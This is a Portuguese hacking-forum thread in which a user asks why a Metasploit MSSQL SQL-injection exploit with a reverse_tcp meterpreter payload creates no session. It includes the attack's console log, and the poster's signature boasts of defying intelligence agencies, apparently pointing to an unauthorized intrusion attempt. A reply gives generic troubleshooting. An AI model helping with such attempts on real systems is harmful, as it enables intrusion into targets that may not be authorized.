Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Questão sobre o metasploit.

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Questão sobre o metasploit.

    Atualmente to tentando acessar um alvo que está vulneravel.
    Tô usando o exploit: (mssql_payload_sqli)
    Junto com o payload: windows/patchupmeterpreter/reverse_tcp
    Só que quando eu inicio, ocorre tudo bem, só não abre a sessão:

    Logs:
    [*] Started reverse TCP handler on 192.168.0.11:15311 [*] Warning: This module will leave dRkiDtiW.exe in the SQL Server %TEMP% directory[*] Writing the debug.com loader to the disk...[*] Converting the debug script to an executable...[*] Uploading the payload, please be patient...[*] Converting the encoded payload...[*] Executing the payload...[*] Almost there, the stager takes a while to execute. Waiting 50 seconds...[*] Exploit completed, but no session was created.

    Alguem sabe a solução?

    PS: O Alvo é linux.

    Thanks.
    WhiteCollarGroup till I die
    MI5, MI6,NSA,FBI,Army, CIA,Navy,Air Force, Mossad, PF and all this shit can't stop me.
    Similar Threads

  • Font Size
    #2
    The "no session was created" message occurs if one of the following
    happens:

    1) The exploit you use doesn't work against the target you selected. Could
    be the exploit is for a different version, there is a problem with the
    exploit code, or there is a problem with the target configuration.

    2) The exploit you use was configured to use a payload that doesn't create
    an interactive session. In this case, the framework has no way of knowing
    whether the exploited worked, because it doesn't receive a connection
    from the target when its successful (for example, running notepad).

    If you try the reverse payload, get that message, and the target service
    doesn't crash, make sure your target settings are correct, and that the
    target system is running the right version of vulnerable software.
    ref: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Comment


    • Font Size
      #3
      Postado Originalmente por dwango Ver Post
      ref: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

      Valeu brow.
      Estou fuçando aqui.

      Muito obrigado.
      WhiteCollarGroup till I die
      MI5, MI6,NSA,FBI,Army, CIA,Navy,Air Force, Mossad, PF and all this shit can't stop me.

      Comment

      X
      Working...
      X